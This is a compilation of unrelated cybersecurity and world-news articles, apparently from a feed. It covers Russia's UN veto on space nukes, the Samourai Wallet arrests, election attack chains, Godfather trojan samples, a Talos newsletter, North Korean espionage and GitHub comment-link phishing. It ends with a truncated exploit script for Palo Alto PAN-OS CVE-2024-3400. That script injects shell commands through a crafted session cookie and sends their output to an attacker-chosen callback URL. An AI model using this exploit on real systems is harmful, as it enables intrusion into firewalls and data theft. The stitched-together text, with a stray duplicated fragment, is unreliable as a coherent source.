A ban on weapons of mass destruction in orbit has stood since 1967. Russia apparently has other ideas.

Russia vetoed a United Nations Security Council resolution Wednesday that would have reaffirmed a nearly 50-year-old ban on placing weapons of mass destruction into orbit, two months after reports Russia has plans to do just that.

Russia's vote against the resolution was no surprise. As one of the five permanent members of the Security Council, Russia has veto power over any resolution that comes before the body. China abstained from the vote, and 13 other members of the Security Council voted in favor of the resolution.

If it passed, the resolution would have affirmed a binding obligation in Article IV of the 1967 Outer Space Treaty, which says nations are "not to place in orbit around the Earth any objects carrying nuclear weapons or any other kinds of weapons of mass destruction."

**Going Nuclear**

Russia is one of 115 parties to the Outer Space Treaty. The Security Council vote Wednesday follows reports in February that Russia is developing a nuclear anti-satellite weapon.

"The United States assesses that Russia is developing a new satellite carrying a nuclear device," said Jake Sullivan, President Biden's national security advisor. "We have heard President Putin say publicly that Russia has no intention of deploying nuclear weapons in space. If that were the case, Russia would not have vetoed this resolution."

The United States and Japan proposed the joint resolution, which also called on nations not to develop nuclear weapons or any other weapons of mass destruction designed to be placed into orbit around the Earth. In a statement, US and Japanese diplomats highlighted the danger of a nuclear detonation in space. Such an event would have "grave implications for sustainable development, and other aspects of international peace and security," US officials said in a press release.

With its abstention from the vote, "China has shown that it would rather defend Russia as its junior partner, than safeguard the global nonproliferation regime," said Linda Thomas-Greenfield, the US ambassador to the UN.

US government officials have not offered details about the exact nature of the anti-satellite weapon they say Russia is developing. A nuclear explosion in orbit would destroy numerous satellites—from many countries—and endanger astronauts. Space debris created from a nuclear detonation could clutter orbital traffic lanes needed for future spacecraft.

The Soviet Union launched more than 30 military satellites powered by nuclear reactors. Russia's military space program languished in the first couple of decades after the fall of the Soviet Union, and US intelligence officials say it still lags behind the capabilities possessed by the US Space Force and the Chinese military.

Russia's military funding has largely gone toward the war in Ukraine for the last two years, but Putin and other top Russian officials have raised threats of nuclear force and attacks on space assets against adversaries. Russia's military launched a cyberattack against a commercial satellite communications network when it invaded Ukraine in 2022.

Russia has long had an appetite for anti-satellite (ASAT) weapons. The Soviet Union experimented with "co-orbital" ASATs in the 1960s and 1970s. When deployed, these co-orbital ASATs would have attacked enemy satellites by approaching them and detonating explosives or using a grappling arm to move the target out of orbit.

In 1987, the Soviet Union launched an experimental weapons platform into orbit to test laser technologies that could be used against enemy satellites. Russia shot down one of its own satellites in 2021 in a widely condemned "direct ascent" ASAT test. This Russian direct ascent ASAT test followed demonstrations of similar capability by China, the United States, and India. Russia's military has also demonstrated satellites over the last decade that could grapple onto an adversary's spacecraft in orbit, or fire a projectile to take out an enemy satellite.

These ASAT capabilities could destroy or disable one enemy satellite at a time. The US Space Force is getting around this threat by launching large constellations of small satellites to augment the military's much larger legacy communications, surveillance, and missile warning spacecraft. A nuclear ASAT weapon could threaten an entire constellation or render some of space inaccessible due to space debris.

Russia's ambassador to the UN, Vasily Nebenzya, called this week's UN resolution "an unscrupulous play of the United States" and a "cynical forgery and deception." Russia and China proposed an amendment to the resolution that would have banned all weapons in space. This amendment got the support of about half of the Security Council but did not pass.

Outside the 15-member Security Council, the original resolution proposed by the United States and Japan won the support of more than 60 nations as co-sponsors.

"Regrettably, one permanent member decided to silence the critical message we wanted to send to the present and future people of the world: Outer space must remain a domain of peace, free of weapons of mass destruction, including nuclear weapons," said Kazuyuki Yamazaki, Japan's ambassador to the UN.

_This story originally appeared on_ _Ars Technica._

Russia Vetoed a UN Resolution to Ban Space Nukes

By Waqas
The official website of Samourai Wallet has been seized, while its official app on the Apple Store and Google Play has been removed.
This is a post from HackRead.com Read the original post: Feds Bust Privacy-Centric Samourai Wallet Over BTC Money Laundering

The United States has taken down the popular “privacy-focused” Bitcoin wallet Samourai, arresting founders and accusing them of laundering $2 billion in crypto, including dark web funds.

The US Department of Justice has arrested the founders of Samourai Wallet, a popular Bitcoin wallet marketed for its strong privacy features. Keonne Rodriguez and William Lonergan Hill now face charges of conspiracy to commit money laundering and operating an unlicensed money transmitting business.

The seized website of the Samourai Wallet (Screenshot: Hackread.com)

Samourai Wallet, known for its “Whirlpool” and “Ricochet” anonymization tools, had long attracted users seeking enhanced privacy for their Bitcoin transactions. However, the DOJ alleges that this cover of secrecy facilitated a staggering amount of illicit activity.

According to the indictment, Samourai allegedly processed over $2 billion in transactions, with at least $100 million originating from illegal dark web marketplaces like Silk Road and Hydra Market.

“For almost 10 years, Keonne Rodriguez and William Hill allegedly operated a mobile cryptocurrency mixing platform which provided other criminals a virtual haven for the clandestine exchange of illicit funds, the facilitation of more than $2 billion in illegal transactions, and $100 million in dark web money laundering,” stated FBI Assistant Director in Charge James Smith. “The FBI is committed to exposing covert financial schemes and ensuring no one can hide behind a screen to perpetuate financial wrongdoing.”

The indictment further accuses Rodriguez and Hill of profiting from these alleged illegal transactions. Samourai allegedly generated millions in fees through its services, raising questions about the company’s true mission.

The takedown of Samourai Wallet has sent shivers down the spines of privacy-focused crypto enthusiasts. Some argue that the ability to conduct anonymous transactions is a core principle of cryptocurrency, essential for protecting users from financial surveillance. Others, however, see the case as validating concerns that criminals can exploit anonymity tools.

The outcome of this case is likely to have a lasting impact on the cryptocurrency industry. It could lead to increased scrutiny of privacy-focused technologies and potentially stricter regulations for cryptocurrency exchanges and wallets.

In the meantime, Samourai Wallet’s website has been seized, and their mobile application is expected to be removed from app stores. Whether Rodriguez and Hill will be found guilty remains to be seen, their arrest goes on to show the the potential consequences for those who operate in the restricted areas of cryptocurrency and anonymity.

1.  Crypto tumbler BestMixer.io seized for money laundering
2.  New Dark Web Market Styx: Focuses on Money Laundering
3.  Android Money Transfer XHelper App was Laundering Money
4.  DeepDotWeb admin pleads guilty to money laundering, kickbacks
5.  2 Russians charged in Mt. Gox Bitcoin heist, BTC-e money laundering
6.  US Blacklists Tornado Cash, GitHub Removes Co-Founder in Response

Feds Bust Privacy-Centric Samourai Wallet Over BTC Money Laundering

Hackers can influence voters with media and breach campaigns, or try tampering with votes. Or they can combine these tactics to even greater effect.

Source: Lennart Worthmann via Alamy Stock Photo

If history has anything to tell us, the most significant cyber threat to this year's elections won't be a leak, a distributed denial-of-service (DDoS) attack, or a fake news video. Instead, it will be some combination of these or more.

In cyberspace's salad days, hackers caused all kinds of fuss using simple, direct methods: hiding viruses in advertisements, hacking websites with easily guessed passwords, and so on. While that still happens, attackers often have to get more creative by chaining multiple tactics together in order to achieve their goals, thanks to greater cybersecurity awareness and protections.

So too with elections. In 2006, aides to Joe Lieberman's presidential campaign had to resort to their personal emails when a DoS attack froze their IT systems. A decade later, famously, came the Podesta email leak. Now, according to Mandiant, part of Google Cloud, the most potent threats to the democratic process are chained attacks.

"In the most significant cyber incidents targeting elections that Mandiant has tracked, threat actors have deliberately layered multiple tactics in hybrid operations in such a way that the effect of each component magnifies the others," the firm wrote in a new report.

**Combination Election Attacks**

One case study Mandiant pointed to occurred in 2014 when Ukraine's presidential elections were interrupted by a Russian cyber onslaught, following the ouster of its pro-Russian president Viktor Yanukovich, and Russia's invasion of Crimea.

A week before election day, Russian actors hiding behind the hacktivist moniker "Cyber Berkut" struck websites relating to NATO and Ukrainian media outlets with DDoS attacks. That set the stage for when, with four days to go, the same fake hacktivist group broke into the country's central election computers and deleted files and rendered the vote tallying system inoperable.

A day later, they added to the chaos by breaking more election infrastructure, then leaking the emails and documents stored there to the wider Internet. Lastly, just 40 minutes before election results were to be broadcast to the public, the country's Central Election Commission reportedly removed some kind of virus that was designed to present fake results in favor of the far-right, ultra-nationalist candidate.

This extreme brand of combination cyber warfare might have only happened in a country experiencing such upheaval, but other chained cyberattacks have struck more-stable democracies since.

In 2020, two 20-something Iranian nationals carried out a campaign against multiple US states' voting-related websites. They managed to obtain confidential voter information from at least one of them, which they used to send intimidating and misleading emails, including by spreading a video with disinformation about election infrastructure vulnerabilities. They also breached one media company, which, as the Department of Justice noted, could have provided them another channel through which to disseminate their false claims.

"Leaks are particularly powerful. Potentially more powerful when boosted through the compromise of legitimate media," says John Hultquist, chief analyst with Mandiant Intelligence at Google Cloud.

The breach/fake news ploy is a potent concoction. "These disinformation efforts are often orchestrated by state-backed entities from nations such as China, Russia, and Iran," warns Madison Horn, herself a 2024 candidate running for a congressional seat in Oklahoma's 5th district. "Their impact is undeniable, as seen in instances like Russia’s involvement in the 2016 US election and China’s ongoing global influence operations, which starkly demonstrate their capacity to sway public opinion and disrupt electoral integrity."

**The Threat From Cybercrime**

It's not only state-sponsored actors that pose a threat to the democratic process, Mandiant noted. Insiders, hacktivists, and cybercriminals all muddy the waters in their own ways.

In most cases, "The avenues for these campaigns are popular social media platforms — X, Telegram, Facebook — and YouTube, making the digital battlefield as accessible as it is dangerous," Horn warns.

From January 2023 to March 2024, the cybersecurity firm BrandShield tracked suspicious new social media accounts and web domains relating to Joe Biden's and Donald Trump's presidential campaigns. It found hundreds of imposter accounts across social media sites, as well as 2,335 suspect websites claiming some sort of affiliation with the president and 9,639 for the former president (helped by a 197% boost following his arrest in August).

Fake Trump site. Source: BrandShield

Fake sites and accounts are useful for spreading scams or malware and for stealing funds that voters intended to go to candidates, or they can be used in concert with other tactics to achieve greater ends.

"They can be used to get people's information, and maybe try to influence their views by distributing fake news," says BrandShield CEO Yoav Keren, formerly an adviser in the Israeli Knesset. "I would even think that they can use these platforms to interact with real people from the campaigns, to infiltrate their systems. These impersonations can be used in a lot of different ways."

"I don't want to give too many good ideas to the bad guys," he says, "but they usually come up with them before I do."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

The Biggest 2024 Elections Threat: Kitchen-Sink Attack Chains

Mobile malware-as-a-service operators are upping their game by automatically churning out hundreds of unique samples on a whim.

Source: Wodthikorn Phutthasatchathum via Alamy Stock Photo

North of 1,000 samples of the Godfather mobile banking Trojan are circulating in dozens of countries worldwide, targeting hundreds of banking apps.

First discovered in 2022, Godfather — which can record screens and keystrokes, intercepts two-factor authentication (2FA) calls and texts, initiates bank transfers, and more — has quickly become one of the most widespread malware-as-a-service offerings in cybercrime, especially mobile cybercrime. According to Zimperium's 2023 "Mobile Banking Heists Report," as of late last year, Godfather was targeting 237 banking apps spread across 57 countries. Its affiliates exfiltrated stolen financial information to at least nine countries, primarily in Europe and including the US.

All that success drew attention, so, to prevent security software from spoiling the party, Godfather's developers have been automatically generating new samples for their customers at a near industrial scale.

Other mobile malware developers across the spectrum have started doing the same thing. "What we're seeing is that malware campaigns are starting to get bigger and bigger," warns Nico Chiaraviglio, chief scientist at Zimperium, who will host a session on this and other mobile malware trends at RSAC in May.

Besides Godfather and other known families, Chiaraviglio is tracking an even bigger, still-under-wraps mobile malware family with more than 100,000 unique samples in the wild. "So that's crazy," he says. "We haven't seen that number of samples in a single malware before, ever. This is definitely a trend."

**Banking Trojans Spawn Hundreds of Samples**

Mobile security is already lagging far behind security for desktops. "In the '90s, no one was really using antivirus on desktop computers, and that's kind of where we are now. Today, only one of four users are really using some sort of mobile protection. Twenty-five percent of devices are completely unprotected, compared with desktop, at 85%," Chiaraviglio laments.

Mobile threats, meanwhile, are leveling up fast. One way they're doing so is by generating so many different iterations that antivirus programs — which profile malware by their unique signatures — have trouble correlating one infection with the next.

Consider that at the time of its initial discovery in 2022, according to Chiaraviglio, there were fewer than 10 samples of Godfather in the wild. By the end of last year, that number had risen a hundredfold.

Its developers have clearly been autogenerating unique samples for customers to help them avoid detection. "They could just be scripting everything — that would be a way to automate it. Another way would be to use large language models, as code assistance can really speed up the development process," Chiaraviglio says.

Other banking Trojan developers have followed the same approach, if at a lesser scale. In December, Zimperium tallied 498 samples of Godfather's close competitor, Nexus, 300 samples of Saderat, and 123 of PixPirate.

**Can Security Software Keep Up?**

Security solutions that tag malware by signature will find difficulty keeping track of hundreds and thousands of samples per family.

"Maybe there is a lot of code reuse between different samples," Chiaraviglio says, something he suggests adaptive solutions can use to correlate related malware with different signatures. Alternatively, instead of the code itself, defenders can use artificial intelligence (AI) to focus on the behaviors of the malware. With a model that can do that, Chiaraviglio says, "it doesn't really matter how much you change the code or the way the application looks, we will still be able to detect it."

But, he admits, "at the same time, this is always a race. We do something \[to adjust\], then the attacker does something to evolve to our predictions. \[For example\], they can ask \[a large language model\] to mutate their code as much as it can. This would be the realm of polymorphic malware, which is not something that happens a lot on mobile, but we might start seeing way more of that."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Godfather Banking Trojan Spawns 1.2K Samples Across 57 Countries

Plus, new details emerge on the Scattered Spider cybercrime network and ArcaneDoor.

Thursday, April 25, 2024 14:00

I wrote last week about the problems arising from the massive backlog of vulnerabilities at the U.S. National Vulnerability Database.  

Thousands of CVEs are still without analysis data, and the once-reliable database of every single vulnerability that’s disclosed and/or patched is now so far behind, it could take up to 100 days for the National Institute of Standards and Technology (NIST) to catch up, and that would be assuming no new vulnerabilities are disclosed during that period. 

While the U.S. government and NIST try to sort out a potential solution, and hopefully await more funding and restructuring, NIST says it’s hoping to launch a consortium to help either rebuild the NVD or create a replacement.  

Other security experts have floated the idea of other companies or organizations creating a brand-new solution of their own. The main problem with that is, what’s in it for them?  

What works about the NVD is that it’s funded by the U.S. government, so the money is always coming in to help fund the workforce and at least gives MITRE and the other private companies who contribute to the NVD motivation to keep working on it. 

To start up a whole new database of \*every\* CVE out there would take countless man-hours, and then what at the end? Would the company or person(s) who created it start charging for access? 

Several open-source solutions have_man-hours_ popped up over the past few weeks, such as “NVD Data Overrides,” which “is meant to provide additional data that is currently missing from NVD.” However, these types of volunteer projects still can’t assign CVSS scores, because only the NVD is authorized to hand out official NVD CVSS scores. 

This brings up another problem for private companies that may want to develop a solution: Do they want to play referee?  

Sometimes, when there’s a disagreement on how severe a vulnerability is and what severity score to assign it, the NVD will weigh in and provide their own, independently calculated CVSS score. Who really wants to be the “bad guy” to get between a massive tech company like Microsoft or Apple and a security researcher saying a vulnerability is a 9.5 out of 10 CVSS? 

I absolutely give major credit to any volunteers or open-source developers who are working on their own solutions for essentially nothing — but how long can we expect them to keep maintaining these databases? 

Unfortunately, I don’t have a great answer for this, either. I’m far from an expert on vulnerability management, nor do I have any connections to the federal government. But I do feel the onus is on the government to come up with a solution, and potentially provide incentives for companies and researchers to participate in this new proposed consortium because I don’t see the incentives there for the private sector to come up with their own solution.  

**The one big thing **

ArcaneDoor is a new campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Talos and Cisco PSIRT recently identified a previously unknown actor, now tracked as UAT4356 by Talos and STORM-1849 by the Microsoft Threat Intelligence Center. This actor utilized bespoke tooling that demonstrated a clear focus on espionage and an in-depth knowledge of the devices that they targeted, hallmarks of a sophisticated state-sponsored actor. UAT4356 deployed two backdoors as components of this campaign, “Line Runner” and “Line Dancer,” which were used collectively to conduct malicious actions on-target, which included configuration modification, reconnaissance, network traffic capture/exfiltration and potentially lateral movement.   

**Why do I care? **

Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications. In the past two years, we have seen a dramatic and sustained increase in the targeting of these devices in areas such as telecommunications providers and energy sector organizations — critical infrastructure entities that are likely strategic targets of interest for many foreign governments. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. 

**So now what? **

There are some known indicators of compromise that customers can look for if they suspect they may have been targeted in this campaign. First, organizations should look for any flows to/from ASA devices to any of the IP addresses present in the IOC list provided at the bottom of this blog. This is one indication that further investigation is necessary. Potential targets can also follow the steps detailed in the Cisco ASA Forensic Investigation Procedures for First Responders. When following these procedures, first responders should NOT attempt to collect a core dump or reboot the device if they believe that the device has been compromised, based on the lina memory region output. Talos also released some Snort signatures to detect the activity on the wire including access attempts. Snort Signatures 63139, 62949 and 45575 have been released to detect the implants or associated behaviors. 

**Top security headlines of the week **

**A previously known Windows print spooler bug is still being actively exploited, according to Microsoft.** The company’s threat research team recently disclosed that APT28, a well-known Russian state-sponsored actor, is exploiting the vulnerability to deliver a previously unknown malware called “GooseEgg.” Microsoft disclosed and patched CVE-2022-38028 in October 2022, but APT28 may have been exploiting it as far back as 2020. The actor’s exploitation involved modifying a JavaScript constraints file in the printer spooler and executing it with SYSTEM-level permissions. The new research prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add CVE-2022-38028 to its Known Exploited Vulnerabilities (KEV) catalog. If installed, GooseEgg can load other applications with System-level permissions and allow the adversary to execute remote code on the targeted device or deploy other backdoors. Another set of print spooler vulnerabilities, called PrintNightmare, made headlines in July 2021, though no one reported active exploitation of that vulnerability at the time. (SC Magazine, Security Week) 

**A new investigation revealed how members of the group Scattered Spider are partnering with Russian state-sponsored actors to carry out ransomware attacks.** Scattered Spider is made up of younger individuals based out of the U.S., U.K. and Canada. They are primarily English speakers who have been blamed for several notable ransomware attacks, including one against MGM Casinos that disrupted operations at several casinos and hotels last year. The group specializes in social engineering, more recently using LinkedIn to steal employee information and use that to infiltrate corporate networks. Members, some as young as teenagers, are connecting over the dark web and online forums like Discord and use their advanced knowledge of Western civilization to provide crucial details to Russian actors. The “60 Minutes” investigation also included new details about The Community (aka “The Comm,” the online collection of hackers who like to brag about their recent cybercrimes, often through Telegram. (CBS News) 

**The U.S. government has re-upped a law that expands government surveillance by opening the door for private companies to partner with the government on these types of activities.** The controversial Foreign Intelligence Surveillance Act (FISA) was re-approved just hours after it lapsed. The White House and proponents in U.S. Congress argued that the powers granted in Section 702 of the FISA helps prevent the spread of terrorism and cyber attacks and that any lapse in those powers would harm the government’s ability to gather crucial intelligence. However, privacy advocates say that the FISA is an overreach, and provides too much power for private companies to potentially spy on consumers. The bill also includes a new definition of “electronic communications service provider,” which could allow the U.S. government to force Big Tech companies and telecommunications providers to hand over users’ data if requested. (NBC News, TechCrunch) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #180: What are the dangers of enabling sideloading and third-party apps? 
*   Suspected CoralRaider continues to expand victimology using three information stealers 
*   Brute-force attacks surge worldwide, warns Cisco Talos    
*   Cisco Warns of Massive Surge in Password-Spraying Attacks on VPNs 
*   Rare Computer Virus Detected in Ukrainian Network, Confidential Document Potentially Compromised 

**Upcoming events where you can find Talos **

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_  

**Most prevalent malware files from Talos telemetry over the past week **

_This section will be on a brief hiatus while we work through some technical difficulties._ _Several open-source solutions have_

The private sector probably isn’t coming to save the NVD

Lazarus, Kimsuky, and Andariel all got in on the action, stealing "important" data from firms responsible for defending their southern neighbors (from them).

Source: Steve Allen Travel Photography via Alamy Stock Photo

North Korea's premiere advanced persistent threats (APTs) have been quietly spying on South Korean defense contractors for at least a year and a half, infiltrating some 10 organizations.

South Korean police this week released the findings of an investigation that uncovered concurrent espionage campaigns carried out by Andariel (aka Onyx Sleet, Silent Chollima, Plutonium), Kimsuky (aka APT 43, Thallium, Velvet Chollima, Black Banshee), and the broader Lazarus Group. Law enforcement did not name the victim defense organizations nor provide details on the stolen data.

The announcement comes one day after North Korea conducted its first-ever drill simulating a nuclear counterattack.

**DPRK APTs Persist**

Few countries are so aware of cyber threats from foreign nation-states as South Korea, and few industries so aware as military and defense. And yet, Kim's best always seem to find a way.

"APT threats, particularly those driven by state-level actors, are notoriously difficult to fully deter," laments Mr. Ngoc Bui, cybersecurity expert at Menlo Security. "If an APT or actor is highly motivated, there are few barriers that can't eventually be overcome."

In November 2022, for instance, Lazarus targeted a contractor which was cyber aware enough to operate separate internal and external networks. However, the hackers took advantage of their negligence in managing the system connecting the two. First, the hackers breached and infected an external network server. While defenses were down for a network test, they tunneled through the network connection system and into the innards. They then began harvesting and exfiltrating "important data" from six employee computers.

In another case beginning around October 2022, Andariel obtained login information belonging to an employee of a company that performed remote IT maintenance for one of the defense contractors in question. Using the hijacked account, it infected the company's servers with malware and exfiltrated data relating to defense technologies.

Police also highlighted an incident that lasted from April to July 2023, in which Kimsuky exploited the groupware email server used by one defense firm's partner company. A vulnerability allowed the unauthorized attackers to download large files that'd been sent internally via email.

**Snuffing Out Lazarus**

Of use to authorities, Bui explains, is that "DPRK groups such as Lazarus frequently reuse not only their malware but also their network infrastructure, which can be both a vulnerability and a strength in their operations. Their OPSEC failures and reuse of infrastructure, combined with innovative tactics such as infiltrating companies, make them particularly intriguing to monitor."

The perpetrators behind each of the defense breaches were identified thanks to the malware they deployed post-compromise — including the Nukesped and Tiger remote access Trojans (RATs) — as well as their architecture and IP addresses. Notably, some of those IPs traced to Shenyang, China, and a 2014 attack against the Korea Hydro & Nuclear Power Co.

"North Korea's hacking attempts targeting defense technology are expected to continue," the Korean National Police Agency said in a statement. The agency recommends that defense companies and their partners use two-factor authentication and periodically change passwords associated with their accounts, cordon off internal from external networks, and block access to sensitive resources for unauthorized and unnecessary foreign IP addresses.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

North Korea APT Triumvirate Spied on South Korean Defense Industry For Years

An utterly innocuous feature in popular Git CDNs allows anyone to conceal malware behind brand names, without those brands being any the wiser.

Source: Image Source Limited via Alamy Stock Photo

Hackers are using unpublished GitHub and GitLab comments to generate phishing links that appear to come from legitimate open source software (OSS) projects.

The clever trick, first described by Sergei Frankoff of Open Analysis last month, allows anyone to impersonate any repository they wish without the owners of that repository knowing about it. And even if the owners do know about it, they can't do anything to stop it.

Case in point: Hackers have already abused this method to distribute the Redline Stealer Trojan, using links associated with Microsoft's GitHub-hosted repos "vcpkg" and "STL," according to McAfee. Frankoff independently discovered more cases involving the same loader used in that campaign, and Bleeping Computer found an additional affected repo, "httprouter."

According to Bleeping Computer, the issue affects both GitHub — a platform with more than 100 million registered users, and its closest competitor, GitLab, with more than 30 million users.

**Undetectable, Unstoppable, Believable Phishing Links**

This remarkable flaw in GitHub and GitLab lies in possibly the most mundane feature imaginable.

Developers will often leave suggestions or report bugs by leaving comments on an OSS project page. Sometimes, such a comment will involve a file: a document, a screenshot, or other media.

When a file is to be uploaded as part of a comment on GitHub's and GitLab's content delivery networks (CDNs), the comment is automatically assigned a URL. This URL is visibly associated with whatever project the comment pertains to. On GitLab, for example, a file uploaded with a comment earns a URL in the following format: https://gitlab.com/{project\_group\_name}/{repo\_name}/uploads/{file\_id}/{file\_name}.

What hackers have figured out is that this provides perfect cover for their malware. They can, for example, upload a malware loader for the RedLine Stealer to a Microsoft repo, and get a link in return. Though it houses malware, to any onlooker, it will appear to be a legitimate link to a real Microsoft repo file.

But that's not all.

If an attacker posts malware to a repo, you'd figure that the owner of that repo or GitHub would spot it and address it.

What they can do, then, is publish and then quickly delete the comment. The URL continues to work and the file remains uploaded to the site's CDN, nonetheless.

Or, even better: The attacker can simply not post the comment to begin with. On both GitHub and GitLab, a working link is automatically generated as soon as a file is added to a comment in progress.

Thanks to this banal quirk, an attacker can upload malware to any GitHub repo they wish, get a link back associated with that repo, and simply leave the comment unpublished. They can use it in phishing attacks for as long as they'd like, while the impersonated brand will have no idea that any such link was generated in the first place.

**Don't Trust Links**

Malicious URLs tied to legitimate repos lend credence to phishing attacks and, conversely, threaten to embarrass and undermine the credibility of the impersonated party.

What's worse: they have no recourse. According to Bleeping Computer, there is no setting that allows owners to manage files attached to their projects. They can temporarily disable comments, concomitantly preventing bug reporting and collaboration with the community, but there is no permanent fix.

Dark Reading reached out to both GitHub and GitLab to ask if they plan on fixing this issue and how. Here's how one responded:

"GitHub is committed to investigating reported security issues. We disabled user accounts and content in accordance with GitHub's Acceptable Use Policies, which prohibit posting content that directly supports unlawful active attack or malware campaigns that are causing technical harms," a GitHub representative said in an email. "We continue to invest in improving the security of GitHub and our users, and are looking into measures to better protect against this activity. We recommend users follow the instructions provided by maintainers on how to download the software that is officially released. Maintainers can utilize GitHub Releases or release processes within package and software registries to securely distribute software to their users."

Dark Reading will update the story if GitLab responds. In the meantime, users should tread lightly.

"Developers seeing the name of a trusted vendor in a GitHub URL will often trust that what they are clicking on is safe and legitimate," says Jason Soroko, senior vice president of product at Sectigo. "There has been a lot of commentary about how URL elements aren't understood by users, or don't have much to do with trust. However, this is a perfect example that URLs are important and have the capacity to create mistaken trust.

"Developers need to rethink their relationship to links associated with GitHub, or any other repository, and invest some time scrutinizing, just like they might with an email attachment."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Hackers Create Legit Phishing Links With Ghost GitHub, GitLab Comments

Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit.

    # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry:    import argparse    import requestsexcept ImportError:    print("Missing dependencies, either requests or argparse not installed")    sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool:    ret = False        uri = "/ssl-vpn/hipreport.esp"        s = requests.Session()    r = ""        headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"    }         headers_noCookie = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0    }        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if r.status_code == 200:        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )        if r.status_code == 403:            print("Target vulnerable to CVE-2024-3400")            ret = True    else:        return ret    return ret        def cmdexec(target: str, callback_url: str, payload: str) -> bool:    ret = False    p = ""    if " " in payload:        p = payload.replace(" ", "${IFS)")    uri = "/ssl-vpn/hipreport.esp"    headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"            }     s = requests.Session()    r = ""        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if not "Success" in r.text:        return ret    else:        ret = True    return ret#Initilize parser for argumentsdef argparser(selection=None):    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )        subparser = parser.add_subparsers( help="Available modules", dest="module")        exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")    exploit_subp.add_argument( "-t", 